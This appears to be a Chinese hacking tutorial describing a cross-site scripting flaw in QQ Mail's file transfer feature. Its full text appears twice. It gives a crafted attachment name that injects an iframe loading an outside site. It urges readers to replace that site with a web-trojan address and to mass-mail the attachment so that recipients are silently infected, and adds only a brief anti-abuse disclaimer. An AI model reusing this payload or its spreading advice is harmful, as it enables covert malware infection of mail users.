09月10日QQ邮箱跨站漏洞
QQ邮箱跨站漏洞就是针对文件中转站
首先,打开我的QQ邮箱,用我自己的做测试...

如图一所示,打开我的QQ邮箱后,找到这个 文件中转站(1)
如图二所示,
点...开始上传,,,,
这个地方写..
这是我们今天要利用的代码;
利用代码:【构造附件】
F:\pigerzhu<iframe src=http://http://www.hxhack.com%20width=800%20height=800/><%2Fiframe>XXS.rar
以上利用代码中的网址http://www.hxhack.com/可以换成你想要的网址,也可以替换成网马地址,这样对方一打开邮件,就会自动打开网马地址。
要是这个里面打开的网址被挂马?对方中马了都不知道吧。
其中的网址可以让你自由发挥,万一把里面的网址换成你的网马地址,再发给别人点击,对方就叫中马了。
如图三所示:
下面怎么办呢?
可以利用群发工具,,进行传播..我就不演示了,,我给自己发一份,,大家看下效果就可以了.

好,我们到收件箱看下..
呵呵,大家可以看到,我们的网站已经弹出来了...是的,就是这样...
大家千万不要利用来恶意搞破坏,发出来只是让大家更好的防护,而不是去搞破坏。
截止此文章发布的时候,漏洞依然存在,腾讯还没有补上这个漏洞。
首先,打开我的QQ邮箱,用我自己的做测试...

如图一所示,打开我的QQ邮箱后,找到这个 文件中转站(1)

如图二所示,
点...开始上传,,,,
这个地方写..
这是我们今天要利用的代码;
利用代码:【构造附件】
F:\pigerzhu<iframe src=http://http://www.hxhack.com%20width=800%20height=800/><%2Fiframe>XXS.rar
以上利用代码中的网址http://www.hxhack.com/可以换成你想要的网址,也可以替换成网马地址,这样对方一打开邮件,就会自动打开网马地址。
要是这个里面打开的网址被挂马?对方中马了都不知道吧。
其中的网址可以让你自由发挥,万一把里面的网址换成你的网马地址,再发给别人点击,对方就叫中马了。

如图三所示:
下面怎么办呢?
可以利用群发工具,,进行传播..我就不演示了,,我给自己发一份,,大家看下效果就可以了.

好,我们到收件箱看下..
呵呵,大家可以看到,我们的网站已经弹出来了...是的,就是这样...

大家千万不要利用来恶意搞破坏,发出来只是让大家更好的防护,而不是去搞破坏。
截止此文章发布的时候,漏洞依然存在,腾讯还没有补上这个漏洞。